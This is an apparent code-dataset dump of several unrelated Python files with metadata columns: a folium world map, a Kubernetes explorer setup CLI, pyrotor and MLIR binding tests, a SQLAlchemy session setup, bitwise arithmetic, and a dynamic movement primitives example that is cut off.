| 34.411765 | 94 | 0.564957 | 156 | 1,170 | 4.24359 | 0.455128 | 0.036254 | 0.048338 | 0.066465 | 0.098187 | 0.098187 | 0.057402 | 0 | 0 | 0 | 0 | 0.038835 | 0.295727 | 1,170 | 33 | 95 | 35.454545 | 0.76335 | 0.282906 | 0 | 0.222222 | 0 | 0 | 0.399276 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.37037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8ed43bb71c54d562b7a95bc4eec941727c4d9a5 | 727 | py | Python | map.py | mwweinberg/elevation_grid | c74598beec1df63286a40e13996e807ddf35b5f5 | [
"MIT"
] | null | null | null | map.py | mwweinberg/elevation_grid | c74598beec1df63286a40e13996e807ddf35b5f5 | [
"MIT"
] | null | null | null | map.py | mwweinberg/elevation_grid | c74598beec1df63286a40e13996e807ddf35b5f5 | [
"MIT"
] | null | null | null | import folium
import json
from folium import plugins
with open('land.geojson') as f:
worldArea = json.load(f)
#for some reason you need to add an attr to make the 'None' tiles work
worldMap = folium.Map(
location=[0, 0],
tiles='None',
attr="<a href=https://michaelweinberg.org/> </a>",
zoom_start=2,)
#this styles the geojson layer
layer_style = {'fillColor': '#FFFAFA', 'color': 'black'}
folium.GeoJson(
worldArea,
style_function=lambda
x:layer_style).add_to(worldMap)
#this adds and styles the marker
folium.CircleMarker(
(34.0522, -118.2437),
radius=10,
weight=4,
color="black",
fill_color="black",
fill_opacity=.5).add_to(worldMap)
worldMap.save('worldmap.html') | 23.451613 | 70 | 0.68088 | 105 | 727 | 4.638095 | 0.638095 | 0.061602 | 0.053388 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033501 | 0.178817 | 727 | 31 | 71 | 23.451613 | 0.782245 | 0.177442 | 0 | 0 | 0 | 0 | 0.17953 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.130435 | 0 | 0.130435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8ef01a997224933628efe6c77f98d912dac22d7 | 8,563 | py | Python | mamba/blockchain/explorer/commands.py | ninhpham0902/akc-mamba | 3454b8365d69a4c5f543f71760a495296fa0a5e8 | [
"MIT"
] | 7 | 2020-04-22T02:35:24.000Z | 2022-01-16T17:14:01.000Z | mamba/blockchain/explorer/commands.py | ninhpham0902/akc-mamba | 3454b8365d69a4c5f543f71760a495296fa0a5e8 | [
"MIT"
] | 9 | 2020-04-07T09:11:08.000Z | 2020-12-29T02:35:12.000Z | mamba/blockchain/explorer/commands.py | ninhpham0902/akc-mamba | 3454b8365d69a4c5f543f71760a495296fa0a5e8 | [
"MIT"
] | 7 | 2020-07-30T02:27:14.000Z | 2022-02-13T09:58:55.000Z | import click
import yaml
import re
import json
import os
import time
from kubernetes import client
from os import path
from utils import hiss, util
from settings import settings
def get_namespace():
# Get domain
domains = settings.ORDERER_DOMAINS.split(' ')
if len(domains) == 0:
domains = settings.PEER_DOMAINS.split(' ')
explorer_namespace = domains[0]
# Create temp folder & namespace
settings.k8s.prereqs(explorer_namespace)
return explorer_namespace
def setup_explorer_db():
# Get domain
explorer_db_namespace = get_namespace()
# Create temp folder & namespace
settings.k8s.prereqs(explorer_db_namespace)
dict_env = {
'DOMAIN': explorer_db_namespace,
'DATABASE_PASSWORD': 'Akachain'
}
# Deploy explorer db sts
explorer_db_template = '%s/explorer/explorer-db-deployment.yaml' % util.get_k8s_template_path()
settings.k8s.apply_yaml_from_template(
namespace=explorer_db_namespace, k8s_template_file=explorer_db_template, dict_env=dict_env)
# Deploy explorer db svc
explorer_db_svc_template = '%s/explorer/explorer-db-service.yaml' % util.get_k8s_template_path()
settings.k8s.apply_yaml_from_template(
namespace=explorer_db_namespace, k8s_template_file=explorer_db_svc_template, dict_env=dict_env)
# Create tables
## Find explorer_db pod
pods = settings.k8s.find_pod(namespace=explorer_db_namespace, keyword="explorer-db")
if not pods:
return hiss.hiss('cannot find tiller pod')
create_tbl_cmd = 'chmod 700 /opt/createdb_new.sh; /opt/createdb_new.sh'
exec_command = [
'/bin/bash',
'-c',
'%s' % (create_tbl_cmd)]
result_get_folder = settings.k8s.exec_pod(
podName=pods[0], namespace=explorer_db_namespace, command=exec_command)
hiss.sub_echo(result_get_folder.data)
def generate_explorer_config():
# Load template config
config_template_path = os.path.abspath(os.path.join(__file__, "../config.json"))
with open(config_template_path, 'r') as f:
explorer_config = json.load(f)
# Update config
orgs = settings.PEER_ORGS.split(' ')
orgs_msp = []
for org in orgs:
orgs_msp.append('%sMSP' % org)
client = {
orgs[0]: {
'tlsEnable': True,
'organization': orgs_msp[0],
'channel': settings.CHANNEL_NAME,
'credentialStore': {
'path': '/opt/explorer/crypto-path/fabric-client-kv-%s' % orgs[0],
'cryptoStore': {
'path': '/tmp/crypto-store/fabric-client-kv-%s' % orgs[0]
}
}
}
}
explorer_config['network-configs']['network-1']['clients'] = client
channel_peers = {}
for x in range(len(orgs)):
domain = util.get_domain(orgs[x])
for y in range(int(settings.NUM_PEERS)):
peer_name = 'peer%s-%s.%s' % (y, orgs[x], domain)
channel_peers[peer_name] = {}
explorer_config['network-configs']['network-1']['channels'] = {
'%s' % settings.CHANNEL_NAME: {
'peers': channel_peers,
'connection': {
'timeout': {
'peer': {
"endorser": "6000",
"eventReg": "6000",
"eventHub": "6000"
}
}
}
}
}
orgs_config = {}
# org
for i in range(len(orgs)):
domain = util.get_domain(orgs[i])
p_config = {
'mspid': '%s' % orgs_msp[i],
'fullpath': False,
'adminPrivateKey': {
'path': '/opt/explorer/crypto-config/peerOrganizations/%s/users/admin/msp/keystore' % domain
},
'signedCert': {
'path': '/opt/explorer/crypto-config/peerOrganizations/%s/users/admin/msp/signcerts' % domain
}
}
orgs_config[orgs_msp[i]] = p_config
# orderer
orderers = settings.ORDERER_ORGS.split(' ')
domain = util.get_domain(orderers[0])
o_config = {
'mspid': '%sMSP' % orderers[0],
'adminPrivateKey': {
'path': '/opt/explorer/crypto-config/ordererOrganizations/'+domain+'/users/admin/msp/keystore'
}
}
orgs_config['%sMSP' % settings.ORDERER_ORGS] = o_config
explorer_config['network-configs']['network-1']['organizations'] = orgs_config
# peers
peers_config = {}
for x in range(len(orgs)):
domain = util.get_domain(orgs[x])
for y in range(int(settings.NUM_PEERS)):
peer_name = 'peer%s-%s.%s' % (y, orgs[x], domain)
config = {
'tlsCACerts': {
'path': '/opt/explorer/crypto-config/peerOrganizations/'+domain+'/peers/peer%s.%s' % (y, domain)+'/tls/tlsca.mambatest-cert.pem'
},
'url': 'grpcs://%s:7051' % peer_name,
'eventUrl': 'grpcs://%s:7053' % peer_name,
'grpcOptions': {
'ssl-target-name-override': peer_name
}
}
peers_config[peer_name] = config
explorer_config['network-configs']['network-1']['peers'] = peers_config
# orderers
orderers_config = {}
for x in range(len(orderers)):
domain = util.get_domain(orderers[x])
for y in range(int(settings.NUM_ORDERERS)):
orderer_name = 'orderer%s-%s.%s' % (y, orderers[y], domain)
config = {
'url': 'grpcs://%s:7050' % orderer_name,
'grpcOptions': {
'ssl-target-name-override': orderer_name
},
'tlsCACerts': {
'path': '/opt/explorer/crypto-config/ordererOrganizations/'+domain+'/orderers/orderer%s.%s' % (y, domain)+'/tls/tlsca.ordererhai-cert.pem'
}
}
orderers_config[orderer_name] = config
explorer_config['network-configs']['network-1']['orderers'] = orderers_config
return json.dumps(explorer_config)
def create_explorer_config_in_efs(explorer_config):
# Find efs pod
pods = settings.k8s.find_pod(namespace="default", keyword="test-efs")
if not pods:
return hiss.hiss('cannot find tiller pod')
config_path = '%s/explorer-config' % settings.EFS_ROOT
exec_command = [
'/bin/bash',
'-c',
'mkdir -p '+config_path+'; cd '+config_path+'; echo '+explorer_config+' > config.json']
create_file = settings.k8s.exec_pod(
podName=pods[0], namespace="default", command=exec_command)
if create_file.success == False:
return hiss.hiss('cannot create explorer config in %s' % pods[0])
def setup_explorer():
hiss.echo('Generate explorer config')
config = generate_explorer_config()
create_explorer_config_in_efs(json.dumps(config))
hiss.echo('Deploy explorer')
# Get domain
explorer_namespace = get_namespace()
# Create temp folder & namespace
settings.k8s.prereqs(explorer_namespace)
dict_env = {
'DOMAIN': explorer_namespace,
'DATABASE_PASSWORD': 'Akachain',
'EFS_SERVER': settings.EFS_SERVER,
'EFS_PATH': settings.EFS_PATH,
'EFS_EXTEND': settings.EFS_EXTEND,
'PVS_PATH': settings.PVS_PATH
}
# Deploy explorer db sts
explorer_template = '%s/explorer/explorer-deployment.yaml' % util.get_k8s_template_path()
settings.k8s.apply_yaml_from_template(
namespace=explorer_namespace, k8s_template_file=explorer_template, dict_env=dict_env)
# Deploy explorer db svc
explorer_svc_template = '%s/explorer/explorer-service.yaml' % util.get_k8s_template_path()
settings.k8s.apply_yaml_from_template(
namespace=explorer_namespace, k8s_template_file=explorer_svc_template, dict_env=dict_env)
def del_explorer_db():
# Delete sts
return settings.k8s.delete_stateful(name='explorer-db', namespace=get_namespace(), delete_pvc=True)
def del_explorer():
# Delete sts
return settings.k8s.delete_stateful(name='explorerpod', namespace=get_namespace())
@click.group()
def explorer():
"""Explorer"""
pass
@explorer.command('setup', short_help="Setup explorer")
def setup():
hiss.rattle('Setup explorer DB')
setup_explorer_db()
hiss.rattle('Setup explorer')
setup_explorer()
@explorer.command('delete', short_help="Delete explorer")
def delete():
hiss.rattle('Delete explorer DB')
del_explorer_db()
hiss.rattle('Delete explorer')
del_explorer()
| 33.84585 | 158 | 0.615322 | 984 | 8,563 | 5.136179 | 0.178862 | 0.051444 | 0.030075 | 0.024931 | 0.490107 | 0.416304 | 0.339533 | 0.296795 | 0.240602 | 0.219628 | 0 | 0.010044 | 0.255868 | 8,563 | 252 | 159 | 33.980159 | 0.783114 | 0.041925 | 0 | 0.175258 | 0 | 0 | 0.211814 | 0.084628 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051546 | false | 0.015464 | 0.051546 | 0.010309 | 0.139175 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8f2ac3c2bd8f9643692095e9f312a23460f27eb | 3,089 | py | Python | tests/test_iterations.py | bguedj/pyrotor | 31620de00f69d4ff2e0c4c8b03f38f80742c1d44 | [
"MIT"
] | 9 | 2020-11-13T14:38:39.000Z | 2022-03-17T08:51:48.000Z | tests/test_iterations.py | bguedj/pyrotor | 31620de00f69d4ff2e0c4c8b03f38f80742c1d44 | [
"MIT"
] | null | null | null | tests/test_iterations.py | bguedj/pyrotor | 31620de00f69d4ff2e0c4c8b03f38f80742c1d44 | [
"MIT"
] | null | null | null | # !/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Test the iterations module
"""
import unittest
import pytest
import mock
import numpy as np
from pyrotor.iterations import get_kappa_boundaries
from pyrotor.iterations import compute_kappa_max
from pyrotor.iterations import compute_kappa_mean
from pyrotor.iterations import binary_search_best_trajectory
from pyrotor.iterations import iterate_through_kappas
def test_get_kappa_boundaries():
# TODO: Test when model is sklearn model
x = np.array([[1, 2], [1, 2]])
Q = np.array([[1, 2], [3, 4]])
W = np.array([2, 3])
model = [W, Q]
sigma_inverse = np.array([[1, 2], [3, 4]])
c_weight = np.array([1, 1])
expected_kappa_min = 0
expected_kappa_max = 0.4
opti_factor = 2
basis = 'legendre'
basis_dimension = {"A": 1, "B": 1}
basis_features = basis_dimension
independent_variable = {'start': 0, 'end': 1, 'points_nb': 2}
extra_info = {'basis': basis,
'basis_dimension': basis_dimension,
'basis_features': basis_features,
'independent_variable': independent_variable}
kappa_min, kappa_max = get_kappa_boundaries(x, model,
sigma_inverse, c_weight,
opti_factor, extra_info)
assert kappa_min == expected_kappa_min
assert kappa_max == expected_kappa_max
def test_compute_kappa_max():
kappa_mean = 1
expected_kappa_min = 2
opti_factor = 2
kappa_min = compute_kappa_max(kappa_mean, opti_factor)
assert kappa_min == expected_kappa_min
def test_compute_kappa_mean():
f_0 = 1
g_0 = 2
expected_kappa_mean = 0.5
kappa_mean = compute_kappa_mean(f_0, g_0)
assert kappa_mean == expected_kappa_mean
class TestTrajectoryIterations(unittest.TestCase):
def setUp(self):
self.trajectory = mock.Mock()
self.i_call = 0
def fake_compute_trajectory(self):
self.i_call += 1
if self.i_call == 2:
self.trajectory.is_valid = True
def test_binary_search_best_trajectory(self):
self.trajectory.i_binary_search = 0
# case 1: i < 0 -> ValueError as we can't find a solution to this
# optimization
with pytest.raises(ValueError):
binary_search_best_trajectory(self.trajectory, -1, 5, False)
# case 2:
self.trajectory.is_valid = True
self.trajectory.original_weights = [0, 1, 2]
self.trajectory.kappas = [1, 2, 3]
self.i_call = 0
self.trajectory.compute_trajectory = self.fake_compute_trajectory
binary_search_best_trajectory(self.trajectory, 2, 0, False)
assert self.i_call == 0
# FIXME: to test when required dependencies tested
# # case 3:
# i_call = 0
# trajectory.is_valid = False
# trajectory.compute_trajectory = self.fake_compute_trajectory
# binary_search_best_trajectory(optimization, 2, 0)
# assert i_call > 1
def test_iterate_through_kappas(self):
pass
| 30.584158 | 73 | 0.646164 | 406 | 3,089 | 4.635468 | 0.258621 | 0.043039 | 0.055792 | 0.071732 | 0.284803 | 0.22423 | 0.082891 | 0.082891 | 0.082891 | 0.082891 | 0 | 0.026754 | 0.261897 | 3,089 | 100 | 74 | 30.89 | 0.798684 | 0.135643 | 0 | 0.123077 | 0 | 0 | 0.030578 | 0 | 0 | 0 | 0 | 0.01 | 0.076923 | 1 | 0.107692 | false | 0.015385 | 0.138462 | 0 | 0.261538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8f3a3840497a4d3eb2f4ea9b41d1a248b569e7d | 5,659 | py | Python | mlir/test/Bindings/Python/ir_types.py | rarutyun/llvm | 76fa6b3bcade074bdedef740001c4528e1aa08a8 | [
"Apache-2.0"
] | null | null | null | mlir/test/Bindings/Python/ir_types.py | rarutyun/llvm | 76fa6b3bcade074bdedef740001c4528e1aa08a8 | [
"Apache-2.0"
] | null | null | null | mlir/test/Bindings/Python/ir_types.py | rarutyun/llvm | 76fa6b3bcade074bdedef740001c4528e1aa08a8 | [
"Apache-2.0"
] | null | null | null | # RUN: %PYTHON %s | FileCheck %s
import mlir
def run(f):
print("\nTEST:", f.__name__)
f()
# CHECK-LABEL: TEST: testParsePrint
def testParsePrint():
ctx = mlir.ir.Context()
t = ctx.parse_type("i32")
# CHECK: i32
print(str(t))
# CHECK: Type(i32)
print(repr(t))
run(testParsePrint)
# CHECK-LABEL: TEST: testParseError
# TODO: Hook the diagnostic manager to capture a more meaningful error
# message.
def testParseError():
ctx = mlir.ir.Context()
try:
t = ctx.parse_type("BAD_TYPE_DOES_NOT_EXIST")
except ValueError as e:
# CHECK: Unable to parse type: 'BAD_TYPE_DOES_NOT_EXIST'
print("testParseError:", e)
else:
print("Exception not produced")
run(testParseError)
# CHECK-LABEL: TEST: testTypeEq
def testTypeEq():
ctx = mlir.ir.Context()
t1 = ctx.parse_type("i32")
t2 = ctx.parse_type("f32")
t3 = ctx.parse_type("i32")
# CHECK: t1 == t1: True
print("t1 == t1:", t1 == t1)
# CHECK: t1 == t2: False
print("t1 == t2:", t1 == t2)
# CHECK: t1 == t3: True
print("t1 == t3:", t1 == t3)
# CHECK: t1 == None: False
print("t1 == None:", t1 == None)
run(testTypeEq)
# CHECK-LABEL: TEST: testTypeEqDoesNotRaise
def testTypeEqDoesNotRaise():
ctx = mlir.ir.Context()
t1 = ctx.parse_type("i32")
not_a_type = "foo"
# CHECK: False
print(t1 == not_a_type)
# CHECK: False
print(t1 == None)
# CHECK: True
print(t1 != None)
run(testTypeEqDoesNotRaise)
# CHECK-LABEL: TEST: testStandardTypeCasts
def testStandardTypeCasts():
ctx = mlir.ir.Context()
t1 = ctx.parse_type("i32")
tint = mlir.ir.IntegerType(t1)
tself = mlir.ir.IntegerType(tint)
# CHECK: Type(i32)
print(repr(tint))
try:
tillegal = mlir.ir.IntegerType(ctx.parse_type("f32"))
except ValueError as e:
# CHECK: ValueError: Cannot cast type to IntegerType (from Type(f32))
print("ValueError:", e)
else:
print("Exception not produced")
run(testStandardTypeCasts)
# CHECK-LABEL: TEST: testIntegerType
def testIntegerType():
ctx = mlir.ir.Context()
i32 = mlir.ir.IntegerType(ctx.parse_type("i32"))
# CHECK: i32 width: 32
print("i32 width:", i32.width)
# CHECK: i32 signless: True
print("i32 signless:", i32.is_signless)
# CHECK: i32 signed: False
print("i32 signed:", i32.is_signed)
# CHECK: i32 unsigned: False
print("i32 unsigned:", i32.is_unsigned)
s32 = mlir.ir.IntegerType(ctx.parse_type("si32"))
# CHECK: s32 signless: False
print("s32 signless:", s32.is_signless)
# CHECK: s32 signed: True
print("s32 signed:", s32.is_signed)
# CHECK: s32 unsigned: False
print("s32 unsigned:", s32.is_unsigned)
u32 = mlir.ir.IntegerType(ctx.parse_type("ui32"))
# CHECK: u32 signless: False
print("u32 signless:", u32.is_signless)
# CHECK: u32 signed: False
print("u32 signed:", u32.is_signed)
# CHECK: u32 unsigned: True
print("u32 unsigned:", u32.is_unsigned)
# CHECK: signless: i16
print("signless:", mlir.ir.IntegerType.get_signless(ctx, 16))
# CHECK: signed: si8
print("signed:", mlir.ir.IntegerType.get_signed(ctx, 8))
# CHECK: unsigned: ui64
print("unsigned:", mlir.ir.IntegerType.get_unsigned(ctx, 64))
run(testIntegerType)
# CHECK-LABEL: TEST: testIndexType
def testIndexType():
ctx = mlir.ir.Context()
# CHECK: index type: index
print("index type:", mlir.ir.IndexType(ctx))
run(testIndexType)
# CHECK-LABEL: TEST: testFloatType
def testFloatType():
ctx = mlir.ir.Context()
# CHECK: float: bf16
print("float:", mlir.ir.BF16Type(ctx))
# CHECK: float: f16
print("float:", mlir.ir.F16Type(ctx))
# CHECK: float: f32
print("float:", mlir.ir.F32Type(ctx))
# CHECK: float: f64
print("float:", mlir.ir.F64Type(ctx))
run(testFloatType)
# CHECK-LABEL: TEST: testNoneType
def testNoneType():
ctx = mlir.ir.Context()
# CHECK: none type: none
print("none type:", mlir.ir.NoneType(ctx))
run(testNoneType)
# CHECK-LABEL: TEST: testComplexType
def testComplexType():
ctx = mlir.ir.Context()
complex_i32 = mlir.ir.ComplexType(ctx.parse_type("complex<i32>"))
# CHECK: complex type element: i32
print("complex type element:", complex_i32.element_type)
f32 = mlir.ir.F32Type(ctx)
# CHECK: complex type: complex<f32>
print("complex type:", mlir.ir.ComplexType.get_complex(f32))
index = mlir.ir.IndexType(ctx)
try:
complex_invalid = mlir.ir.ComplexType.get_complex(index)
except ValueError as e:
# CHECK: invalid 'Type(index)' and expected floating point or integer type.
print(e)
else:
print("Exception not produced")
run(testComplexType)
# CHECK-LABEL: TEST: testVectorType
def testVectorType():
ctx = mlir.ir.Context()
f32 = mlir.ir.F32Type(ctx)
shape = [2, 3]
# CHECK: vector type: vector<2x3xf32>
print("vector type:", mlir.ir.VectorType.get_vector(shape, f32))
index = mlir.ir.IndexType(ctx)
try:
vector_invalid = mlir.ir.VectorType.get_vector(shape, index)
except ValueError as e:
# CHECK: invalid 'Type(index)' and expected floating point or integer type.
print(e)
else:
print("Exception not produced")
run(testVectorType)
# CHECK-LABEL: TEST: testTupleType
def testTupleType():
ctx = mlir.ir.Context()
i32 = mlir.ir.IntegerType(ctx.parse_type("i32"))
f32 = mlir.ir.F32Type(ctx)
vector = mlir.ir.VectorType(ctx.parse_type("vector<2x3xf32>"))
l = [i32, f32, vector]
tuple_type = mlir.ir.TupleType.get_tuple(ctx, l)
# CHECK: tuple type: tuple<i32, f32, vector<2x3xf32>>
print("tuple type:", tuple_type)
# CHECK: number of types: 3
print("number of types:", tuple_type.num_types)
# CHECK: pos-th type in the tuple type: f32
print("pos-th type in the tuple type:", tuple_type.get_type(1))
run(testTupleType)
| 26.32093 | 79 | 0.684397 | 786 | 5,659 | 4.85369 | 0.165394 | 0.06291 | 0.044037 | 0.050328 | 0.302752 | 0.221494 | 0.174836 | 0.115596 | 0.115596 | 0.089646 | 0 | 0.044049 | 0.165577 | 5,659 | 214 | 80 | 26.443925 | 0.763871 | 0.288213 | 0 | 0.327869 | 0 | 0 | 0.136169 | 0.005789 | 0 | 0 | 0 | 0.004673 | 0 | 1 | 0.106557 | false | 0 | 0.008197 | 0 | 0.114754 | 0.360656 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8f40e675815c796a01caa3a7939e40cfb63bac7 | 1,050 | py | Python | lsf/database/__init__.py | unknownkz/LynxSuperFederation | 010c90100ca9599e972d0a3c45f04c38cad0a31e | [
"MIT"
] | 7 | 2022-02-02T01:56:06.000Z | 2022-03-08T01:51:53.000Z | lsf/database/__init__.py | unknownkz/LynxSuperFederation | 010c90100ca9599e972d0a3c45f04c38cad0a31e | [
"MIT"
] | null | null | null | lsf/database/__init__.py | unknownkz/LynxSuperFederation | 010c90100ca9599e972d0a3c45f04c38cad0a31e | [
"MIT"
] | 1 | 2022-02-02T02:33:04.000Z | 2022-02-02T02:33:04.000Z | import atexit
import sys
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import scoped_session, sessionmaker
from .. import DATABASE_URL
from .. import LOGGER as LSF_LOGS
if DATABASE_URL and DATABASE_URL.startswith("postgres://"):
DATABASE_URL = DATABASE_URL.replace("postgres://", "postgresql://", 1)
def start() -> scoped_session:
machine = create_engine(DATABASE_URL, echo=True)
LSF_LOGS.info("[PostgreSQL] Connecting to database...")
BASE.metadata.bind = machine
BASE.metadata.create_all(machine, checkfirst=True)
return scoped_session(sessionmaker(bind=machine, autoflush=True, autocommit=False, expire_on_commit=True))
try:
BASE = declarative_base()
SESSION = start()
LSF_LOGS.info("[PostgreSQL] Connection successfully, session started.")
SESSION.commit()
sys.stdout.flush()
atexit.register(SESSION)
except Exception as e:
LSF_LOGS.exception(f"[PostgreSQL] Failed to connect due to {e}")
finally:
SESSION.close()
| 29.166667 | 110 | 0.748571 | 132 | 1,050 | 5.80303 | 0.469697 | 0.086162 | 0.065274 | 0.05483 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001112 | 0.14381 | 1,050 | 35 | 111 | 30 | 0.850945 | 0 | 0 | 0 | 0 | 0 | 0.16 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.269231 | 0 | 0.346154 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8fa19ce3b5416c38174ee4932db546534bd234b | 1,801 | py | Python | problems/arithmetic.py | chrisxue815/leetcode_python | dec3c160d411a5c19dc8e9d96e7843f0e4c36820 | [
"Unlicense"
] | 1 | 2017-06-17T23:47:17.000Z | 2017-06-17T23:47:17.000Z | problems/arithmetic.py | chrisxue815/leetcode_python | dec3c160d411a5c19dc8e9d96e7843f0e4c36820 | [
"Unlicense"
] | null | null | null | problems/arithmetic.py | chrisxue815/leetcode_python | dec3c160d411a5c19dc8e9d96e7843f0e4c36820 | [
"Unlicense"
] | null | null | null | import unittest
def add(a, b):
a &= 0xFFFFFFFF
b &= 0xFFFFFFFF
while b:
a, b = a ^ b, ((a & b) << 1)
if a & 0x80000000:
a |= -0x80000000
else:
a &= 0xFFFFFFFF
return a
def sub(a, b):
return add(a, add(~b, 1))
def mul(a, b):
if not a or not b:
return 0
if a == 1:
return b
if b == 1:
return a
pos = (a < 0) == (b < 0)
if a < 0:
a = -a
if b < 0:
b = - b
result = 0
while b != 1:
if b & 1:
result += a
a <<= 1
b >>= 1
result += a
return result if pos else -result
def div(a, b):
if not b:
return float('inf')
if not a:
return 0
pos = (a < 0) == (b < 0)
if a < 0:
a = -a
if b < 0:
b = - b
result = 0
for i in range(31, -1, -1):
if a >> i >= b:
result += 1 << i
a -= b << i
return result if pos else -result
class Test(unittest.TestCase):
def test(self):
for i in range(20):
for j in range(20):
self._test(i, j)
def _test(self, a, b):
self._test_arithmetic(a, b)
self._test_arithmetic(a, -b)
self._test_arithmetic(-a, b)
self._test_arithmetic(-a, -b)
def _test_arithmetic(self, a, b):
self.assertEqual(a + b, add(a, b))
self.assertEqual(b + a, add(b, a))
self.assertEqual(a - b, sub(a, b))
self.assertEqual(b - a, sub(b, a))
self.assertEqual(a * b, mul(a, b))
self.assertEqual(b * a, mul(b, a))
if b:
self.assertEqual(int(float(a) / b), div(a, b))
if a:
self.assertEqual(int(float(b) / a), div(b, a))
if __name__ == '__main__':
unittest.main()
| 18.191919 | 58 | 0.44975 | 274 | 1,801 | 2.883212 | 0.142336 | 0.055696 | 0.060759 | 0.050633 | 0.367089 | 0.358228 | 0.16962 | 0.16962 | 0.16962 | 0.16962 | 0 | 0.046642 | 0.404775 | 1,801 | 98 | 59 | 18.377551 | 0.690299 | 0 | 0 | 0.305556 | 0 | 0 | 0.006108 | 0 | 0 | 0 | 0.027762 | 0 | 0.111111 | 1 | 0.097222 | false | 0 | 0.013889 | 0.013889 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8fc72a3f584f848048bd8a428067db601aaf3e3 | 4,894 | py | Python | examples/models/dmp.py | Pandinosaurus/pyrobolearn | 9cd7c060723fda7d2779fa255ac998c2c82b8436 | [
"Apache-2.0"
] | 2 | 2021-01-21T21:08:30.000Z | 2022-03-29T16:45:49.000Z | examples/models/dmp.py | Pandinosaurus/pyrobolearn | 9cd7c060723fda7d2779fa255ac998c2c82b8436 | [
"Apache-2.0"
] | null | null | null | examples/models/dmp.py | Pandinosaurus/pyrobolearn | 9cd7c060723fda7d2779fa255ac998c2c82b8436 | [
"Apache-2.0"
] | 1 | 2020-09-29T21:25:39.000Z | 2020-09-29T21:25:39.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Provide some examples using DMPs.
"""
from pyrobolearn.models.dmp import *
# tests canonical systems
discrete_cs = DiscreteCS()
rhythmic_cs = RhythmicCS()
# plot canonical systems
plt.subplot(1, 2, 1)
plt.title('Discrete CS')
for tau in [1., 0.5, 2.]:
rollout = discrete_cs.rollout(tau=tau)
plt.plot(np.linspace(0, 1., len(rollout)), rollout, label='tau='+str(tau))
plt.legend()
plt.subplot(1, 2, 2)
plt.title('Rhythmic CS')
for tau in [1., 0.5, 2.]:
rollout = rhythmic_cs.rollout(tau=tau)
plt.plot(np.linspace(0, 1., len(rollout)), rollout, label='tau='+str(tau))
plt.legend()
plt.show()
# tests basis functions
num_basis = 20
discrete_f = DiscreteForcingTerm(discrete_cs, num_basis)
rhythmic_f = RhythmicForcingTerm(rhythmic_cs, num_basis)
plt.subplot(1, 2, 1)
rollout = discrete_cs.rollout()
plt.title('discrete basis fcts')
plt.plot(rollout, discrete_f.psi(rollout))
plt.subplot(1, 2, 2)
rollout = rhythmic_cs.rollout()
plt.title('rhythmic basis fcts')
plt.plot(rollout, rhythmic_f.psi(rollout))
plt.show()
# tests forcing terms
f = np.sin(np.linspace(0, 2*np.pi, 100))
discrete_f.train(f, plot=True)
f = np.sin(np.linspace(0, 2*np.pi, int(2*np.pi*100)))
rhythmic_f.train(f, plot=True)
# Test discrete DMP
discrete_dmp = DiscreteDMP(num_dmps=1, num_basis=num_basis)
t = np.linspace(-6, 6, 100)
y_target = 1 / (1 + np.exp(-t))
discrete_dmp.imitate(y_target)
y, dy, ddy = discrete_dmp.rollout()
plt.plot(y_target, label='y_target')
plt.plot(y[0], label='y_pred')
# plt.plot(dy[0])
# plt.plot(ddy[0])
y, dy, ddy = discrete_dmp.rollout(new_goal=np.array([2.]))
plt.plot(y[0], label='y_scaled')
plt.title('Discrete DMP')
plt.legend()
plt.show()
# tests basis functions
num_basis = 100
# Test Biologically-inspired DMP
t = np.linspace(0., 1., 100)
y_d = np.sin(np.pi * t)
new_goal = np.array([[0.8, -0.25],
[0.8, 0.25],
[1.2, -0.25]])
discrete_dmp = DiscreteDMP(num_dmps=2, num_basis=num_basis)
